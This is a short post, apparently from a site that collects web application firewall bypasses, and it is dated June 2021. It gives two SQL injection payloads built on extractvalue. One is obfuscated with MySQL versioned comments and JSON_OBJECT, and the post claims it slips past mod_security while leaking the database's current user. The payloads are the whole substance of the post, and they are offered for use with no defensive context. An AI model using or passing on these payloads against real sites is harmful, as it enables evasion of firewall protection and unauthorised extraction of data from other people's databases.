WAF bypass by _Y000_

Date: June 26, 2021Author: wafbypass

Xpath injection bypass + Json_object

? and extractvalue(0x0a,concat(0x0a,(select current_user()))) ?

? /*!50000and*/ /*!50000extractvalue*/(0x0a,/*!50000concat(0x0a,(select JSON_OBJECT(1, current_user())))*/) ?

Waf= mod_security

#bypass #waf #payload https://t.co/VTFrG46Jt6

Subscribe for the latest news:

Web application firewalls bypasses collection and testing tools